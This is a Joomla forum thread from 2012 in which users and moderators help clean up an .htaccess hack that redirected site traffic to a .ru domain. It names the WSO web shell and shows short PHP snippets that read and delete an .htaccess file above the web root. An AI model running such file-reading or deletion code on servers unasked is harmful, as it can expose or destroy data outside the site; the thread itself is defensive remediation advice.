Thanks for your reply. I missed a couple of .htaccess files! Thanks for info on the scanning site - just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now, which is a relief - see screenshots.
Thanks Andy
Screenshot.png
Screenshot2.png
You do not have the required permissions to view the files attached to this post.

User avatar
kurchania
Joomla! Hero
Joomla! Hero
Posts: 2070
Joined: Mon Sep 21, 2009 6:56 am
Location: indore,india
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by kurchania » Wed Apr 04, 2012 5:08 am

@andysdp
the site is hacked using wso2.5 web shell secript which replace all the htaccess of root folder.this script can give access to all file.
if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
Please review tmp folder. you can find the cache_ file there with preg replace again.
remember the date on which this script is uploaded in the server.
if this is shared hosting please consult with your hosting provider because one domain can affect all the sub domains. mean file present in any other domain in shared hosting can access your code also.
also better search in log file when this file is inserted in the server.ask your hosting provider to restore the backup before this date and then update everything

Regards
Abhijeet
abhijeet kurchania
The future depends on what you do today

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Wed Apr 04, 2012 10:03 am

andysdp wrote:I missed a couple of .htaccess files! Thanks for info on the scanning site -...
Or those files got infected after you looked at them before

andysdp wrote:... just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now,
Did the 1.5.23 site not throw out a warning of old software ? That site is likely to be infected again !

Have you checked all the extensions are up to date and not on the VEL ?

Have you checked all computers with admin/ftp access and with how many anti malware/antivirus programs ?

To be sure perhaps run the Forum Post Assistant on both sites and post the results here ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Wed Apr 04, 2012 11:03 am

kurchania - thanks for showing up so late at the party, sorry you havent had time to read the topic or the post you are answeering which clearly says his site is now fixed.

your attempt to be helpful by retelling the canteen gossip is unfortunately badly placed.
kurchania wrote:@andysdp
the site is hacked using wso2.5
it is known by many names, some listed in this topic
if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
as listed in the http://forum.joomla.org/viewtopic.php?f=621&t=582854 and quoted many times in this topic along with the rest of the info you provided.
as we have mentioned before to "certain" people, please read the full topic then post considerately and helpfully, and dont confuse .

Summary of this topic so far.
* affects all hosts and server configurations
* is not joomla specific (vb/wp/drup/html sites all report issues)

procedure to repair
see the forum sticky Before you post : read and action this

concentrate on http://docs.joomla.org/Security_Checklist_7 with specific attention to http://docs.joomla.org/Security_Checkli ... ter_relief
and http://docs.joomla.org/Security_Checkli ... d_and_cron

suggestion: create a htaccess file in the tmp folder with the code from http://docs.joomla.org/Security_Checkli ... ermissions to attempt to hamper attacks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
kurchania
Joomla! Hero
Joomla! Hero
Posts: 2070
Joined: Mon Sep 21, 2009 6:56 am
Location: indore,india
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by kurchania » Wed Apr 04, 2012 11:59 am

@mandville,
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post.
I apology if this look like canteen gossip that some shell script is running freely on shared server hosting which have privilege to affect all the domains/permission/Database/Brutal attack.
abhijeet kurchania
The future depends on what you do today

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Wed Apr 04, 2012 12:27 pm

kurchania wrote:...
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post....
Looks like you have holes in your security that lets them in. Or never deleted all your files.

Please use the Forum Post Assistant and post the results here. Also the site in the form of www.site dot com
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Mon Apr 09, 2012 2:36 am

A very easy written article on the htaccess hacks can be found here: http://www.squidoo.com/htaccess-hacked
it relies on either a website with poor protection or the use of the ftp password. They normally obtain this from a Trojan virus on your system.
Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

denisw
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Mar 11, 2012 7:27 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by denisw » Wed Apr 11, 2012 9:42 pm

- It seems to me it could be an automatic attack for the wide range of hosts affected in a very similar way, so if anyone has any details it will probably apply to others as well;
- Vulnerability used (previously unknown) was:
http://www.nonumber.nl/news/releases/28 ... extensions

denisw
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun Mar 11, 2012 7:27 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by denisw » Thu Apr 12, 2012 8:22 pm

Some more info about godaddy (all files removed by 404 not found still redirects to attackers site) issues:

Apparently there is something above 'root directory'. It isn't accessible from FTP or FTP*File manager, but it is still there. Attack put .htaccess in there and ErrorDocument apache directives in there applied.

To check that I used the following php code placed into root:

Code: Select all

<?php
readfile('../.htaccess');
and to remove:

Code: Select all

<?php
unlink('../.htaccess');

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PhilD » Thu Apr 12, 2012 10:37 pm

I have said that several times in several posts here. The hack PLACES A COPY of the hacked htaccess file with the redirects in it above publicly accessible directories. This file needs to be found and removed as htaccess files do not belong outside of a publicly accessible area. The hacking put it there and they can access this file by way of the additional files placed within the publicly accessible areas of your site. When I mention publicly accessible areas, I mean where normal site (Joomla) files are installed. This is usually public_html, but some hosts call this area www, htdocs, or something similar
PhilD

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Thu Apr 12, 2012 11:43 pm

Hi PhilD

With shared Hosting(as I'm sure you know) there are different ways the ftp folders are organised.
  1. On some packages ftp Access is to the folder above public_htm.
    Are you saying a .htaccess is being placed above that directory ?
  2. Some shared hosting have the ftp to inside the public_htm. Are you saying the .htaccess file is being placed in the folder above public_htm even though ftp access is not allowed above it ?
Interesting to note that when configuring Akeeba the folders can often be navigated 1 or 2 levels above the highest used in ftp. (in some cases it is possible to view all the Domain names that are shared). Although Akeeba does warn "This directory is outside your site's root. Its contents may be unreadable." when entering a different site tree. But not when going higher than the ftp reaches. So if Akeeba can access then it's not surprising other things can.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Locked

Return to “Security in Joomla! 2.5”